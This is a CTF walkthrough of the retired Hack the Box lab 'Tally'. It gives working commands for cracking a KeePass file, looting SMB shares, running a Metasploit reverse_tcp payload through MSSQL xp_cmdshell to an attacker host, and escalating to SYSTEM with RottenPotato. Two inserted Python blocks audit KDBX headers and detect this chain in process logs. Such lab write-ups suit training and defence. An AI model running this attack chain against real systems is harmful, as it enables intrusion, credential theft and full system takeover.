Hello Friends!! Today we are going to solve a CTF
challenge, "Tally". It is a lab developed by Hack the Box. They have an
amazing collection of online labs on which you can practice your penetration
testing skills. Their labs are designed for everyone from the beginner to the expert
penetration tester. Tally is a retired lab.
Level: Medium
Task: Find the user.txt and root.txt in the
vulnerable Lab.
Let’s Begin!!
As these labs are only available online, they
have a static IP. The Tally lab has IP 10.10.10.59.
Now, as always, let's begin our hacking with port
enumeration.
nmap -p- -A 10.10.10.59
When you explore the target IP through the browser, it
redirects to a SharePoint page as shown below, which nmap also reported in the
image above.
Then we used several
directory brute-forcing tools to enumerate useful web
directories, but failed to retrieve anything. So I searched for web directories manually
with the help of Google and, slowly and gradually, reached /sitepages/FinanceTeam.aspx, where I found
an FTP username as shown in the image below.
Moreover, I found a link
about SharePoint directory brute-force attacks that helped me in my next step.
We found the URL http://10.10.10.59/shared documents/forms/allitems.aspx
from inside the link given above. When you open that path in your browser, as
shown below, you will see a file named "ftp-details". Download this
doc file and open it.
You will get a password from inside the ftp-details doc file.
Now log in to FTP using the following credentials and download tim.kdbx to your local machine.
Username: ftp_user
Password: UTDRSCH53c"$6hys
Since the file has a .kdbx extension and I didn't know
much about it, I turned to Google and found a link
to download a Python script that extracts a HashCat/John-crackable hash from
KeePass 1.x/2.x databases.
python keepass2john.py tim.kdbx > tim
Next, we used John the Ripper to crack the master password from the hash
stored in "tim" with the following command.
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt tim
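The keepass2john step works because the KDBX outer header (signatures, cipher ID, seeds and the AES-KDF transform round count) is stored unencrypted, so anyone who obtains the file can read the KDF cost and start guessing offline. The parser below is an added example, not the page's or keepass2john's code; it reads a KDBX 3.x header from a constructed sample (not tim.kdbx) and reports whether the round count is below an assumed policy threshold, which is the check a defender would run on a database copied to a share.

```python
import struct

# KDBX 3.x outer-header constants; this header is stored unencrypted.
KDBX_SIG1, KDBX_SIG2 = 0x9AA2D903, 0xB54BFB67
AES_CBC_CIPHER_ID = bytes.fromhex("31c1f2e6bf714350be5805216afc5aff")
FIELD_NAMES = {2: "cipher_id", 3: "compression", 4: "master_seed", 5: "transform_seed",
               6: "transform_rounds", 7: "encryption_iv", 8: "protected_stream_key",
               9: "stream_start_bytes", 10: "inner_random_stream_id"}

def parse_kdbx3_header(data: bytes) -> dict:
    """Parse the plaintext KDBX 3.x header: 12-byte prefix, then id/len/value fields."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", data, 0)
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KDBX 2.x database (bad signature)")
    if major != 3:  # KDBX 4 uses 32-bit lengths and a KDF parameter dictionary
        raise ValueError(f"unsupported KDBX major version {major}")
    fields, pos = {"version": f"{major}.{minor}"}, 12
    while True:
        field_id, size = struct.unpack_from("<BH", data, pos)  # u8 id, u16 length
        value, pos = data[pos + 3:pos + 3 + size], pos + 3 + size
        if field_id == 0:  # EndOfHeader: the encrypted payload begins at pos
            break
        if field_id == 6:  # AES-KDF transform rounds, u64 little-endian
            value = struct.unpack("<Q", value)[0]
        fields[FIELD_NAMES.get(field_id, f"field_{field_id}")] = value
    fields["header_length"] = pos
    return fields

def audit_kdbx3(data: bytes, min_rounds: int = 100_000) -> list:
    """Defender checks on a recovered database; min_rounds is an assumed policy value."""
    hdr = parse_kdbx3_header(data)
    findings = []
    if hdr.get("cipher_id") != AES_CBC_CIPHER_ID:
        findings.append("cipher is not AES-256-CBC")
    if hdr.get("transform_rounds", 0) < min_rounds:
        findings.append(f"AES-KDF rounds {hdr.get('transform_rounds', 0)} < {min_rounds}")
    return findings

def _field(field_id, payload): return struct.pack("<BH", field_id, len(payload)) + payload

# Constructed sample header (not tim.kdbx): version 3.1, AES-CBC, gzip, 6000 rounds.
SAMPLE_KDBX_HEADER = (
    struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2, 1, 3)
    + _field(2, AES_CBC_CIPHER_ID) + _field(3, struct.pack("<I", 1))
    + _field(4, bytes(range(32))) + _field(5, bytes(range(32, 64)))
    + _field(6, struct.pack("<Q", 6000)) + _field(7, bytes(16))
    + _field(8, bytes(32)) + _field(9, bytes(32))
    + _field(10, struct.pack("<I", 2)) + _field(0, b"\r\n\r\n")
)
```

Run `audit_kdbx3(open("some.kdbx", "rb").read())` against a real KDBX 3.x file to get the same findings for it.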
Once you obtain the password, you need KeePass 2 (keepass2), the
application that stores these passwords, which you can install
using the following command:
apt-get install keepass2 -y
After installing, run the command below and enter "simplementeyo"
in the master key field.
keepass2 tim.kdbx
Then you can find a username and password under
/Work/Windows/Shares, used for sharing files over SMB, since ports 135-445
are open on the target machine for file sharing.
Here the password is masked with * characters; copy and paste it into a text file
and you will get the password in plain letters, i.e. Acc0unting.
Now that you have the SMB login credential "Finance: Acc0unting", execute the
following command to connect to the target; it will show "ACCT"
as a share name.
smbclient -L 10.10.10.59 -U Finance
Further, type the commands below, and when you find
conn-info.txt, download it.
smbclient //10.10.10.59/ACCT -U Finance
cd zz_Archived
cd SQL
get conn-info.txt
When you open the downloaded conn-info.txt file, it will
give you the MSSQL database login credentials.
db: sa
pass: YE%TJC%&HYbe5Nw
From the image below you can observe that these were old server
details, so the password for sa may have been changed since.
Log in to SMB again and look for the next hint by moving into /zz_Migration; for that,
execute the commands below:
smbclient //10.10.10.59/ACCT -U Finance
cd zz_Migration
cd Binaries
cd "New folder"
Here you will find tester.exe; download it.
get tester.exe
You will get tester.exe inside
your /root directory. Since the file is too large to find the
desired information by reading through it, use the strings command together with grep.
strings tester.exe | grep DATABASE
And you will get a new password for user sa, as shown in the
image below.
For the next step I took help from our previous
article on MSSQL penetration testing. Open a new terminal, load the
Metasploit framework and execute the commands below.
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28
msf exploit(multi/script/web_delivery) > exploit
Copy the highlighted text for the .dll and paste
it in as the CMD command, as shown in the next image.
Now open a new terminal, load Metasploit again
and execute the commands below.
use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set rhost 10.10.10.59
msf auxiliary(admin/mssql/mssql_exec) > set password GWE3V65#6KFH93@4GWTG2G
msf auxiliary(admin/mssql/mssql_exec) > set CMD "Paste above copied .dll text here"
msf auxiliary(admin/mssql/mssql_exec) > exploit
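mssql_exec runs the pasted command through xp_cmdshell, so on the server the loader is launched by cmd.exe whose parent is sqlservr.exe, a parent/child pair a database engine should never produce in normal use. The detection below is an added example, not the page's or Metasploit's code; it runs over constructed process-creation events (modelled on Sysmon Event ID 1 fields, with made-up paths and scriptlet name) and flags a shell spawned by sqlservr.exe and, assuming the copied .dll one-liner is web_delivery's Regsvr32 target (regsvr32 loading scrobj.dll with a remote /i: URL), a regsvr32 that fetches a remote scriptlet.

```python
import re

# regsvr32's /i: argument pointing at a remote scriptlet, the shape web_delivery emits.
REMOTE_SCRIPTLET = re.compile(r"/i:\s*https?://\S+", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed events (not real telemetry from the box) in a simplified
# "key=value|key=value" form using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    "ParentImage=C:\\MSSQL\\Binn\\sqlservr.exe|Image=C:\\Windows\\System32\\cmd.exe"
    "|CommandLine=cmd /c regsvr32 /s /n /u /i:http://10.10.14.28:8080/x.sct scrobj.dll",
    "ParentImage=C:\\Windows\\System32\\cmd.exe|Image=C:\\Windows\\System32\\regsvr32.exe"
    "|CommandLine=regsvr32 /s /n /u /i:http://10.10.14.28:8080/x.sct scrobj.dll",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\regsvr32.exe"
    "|CommandLine=regsvr32 /s C:\\Program Files\\Vendor\\legit.dll",
    "ParentImage=C:\\Windows\\System32\\services.exe|Image=C:\\MSSQL\\Binn\\sqlservr.exe"
    "|CommandLine=sqlservr.exe -sMSSQLSERVER",
]

def parse_event(line: str) -> dict:
    """Split one constructed event line into its fields."""
    return dict(part.split("=", 1) for part in line.split("|"))

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def detect(events: list) -> list:
    """Return (rule, command_line) pairs for every event that matches a rule."""
    alerts = []
    for line in events:
        ev = parse_event(line)
        parent, image = basename(ev["ParentImage"]), basename(ev["Image"])
        cmd = ev["CommandLine"]
        # Rule 1: xp_cmdshell runs its command through cmd.exe as a child of
        # the SQL Server service process, which normal database use never does.
        if parent == "sqlservr.exe" and image in SHELLS:
            alerts.append(("sqlservr_spawned_shell", cmd))
        # Rule 2: regsvr32 loading scrobj.dll with a remote /i: scriptlet URL.
        if image == "regsvr32.exe" and "scrobj.dll" in cmd.lower() and REMOTE_SCRIPTLET.search(cmd):
            alerts.append(("regsvr32_remote_scriptlet", cmd))
    return alerts
```

Rule 1 also fires on any other command run through xp_cmdshell, so it catches the reuse of the sa credential regardless of which loader is pasted into CMD.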
You will get a meterpreter session on the victim's machine in your
first Metasploit console, and then you can finish the task by grabbing the
user.txt and root.txt files. Further, type the following:
getuid
So currently we don't have NT AUTHORITY\SYSTEM permission.
But we have successfully grabbed the user.txt file from inside
/Sarah/Desktop.
cd Sarah/Desktop
ls
cat user.txt
In this way we have completed our first task. Now let's find
root.txt!!
load incognito
Incognito, now a meterpreter extension, was originally a
stand-alone application that permitted you to impersonate user tokens after
successfully compromising a system. The first thing we need to do is
identify whether there are any valid tokens on this system.
list_token -u
As far as impersonation tokens go, you can see that
currently there is no token available.
Then I took help from Google in this scenario and found a
link for downloading RottenPotato
from GitHub for privilege escalation.
git clone https://github.com/foxglovesec/RottenPotato.git
After downloading, it will give you the rottenpotato.exe file.
Upload the exe file to the victim's machine.
upload /root/Desktop/RottenPotato/rottenpotato.exe .
Now type the commands below to execute the exe file and then add the
SYSTEM token under the impersonation tokens.
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
After that, when you run the getuid command again, it will tell you that you have escalated to NT
AUTHORITY\\SYSTEM.
Then come back to the /Users directory and look at the available
directories inside it. You will get root.txt from inside C:\Users\Administrator\Desktop;
go and grab it to finish the task.
cd Administrator
cd Desktop
ls
cat root.txt
Fabulous!! The task has been completed and we have
hacked this box.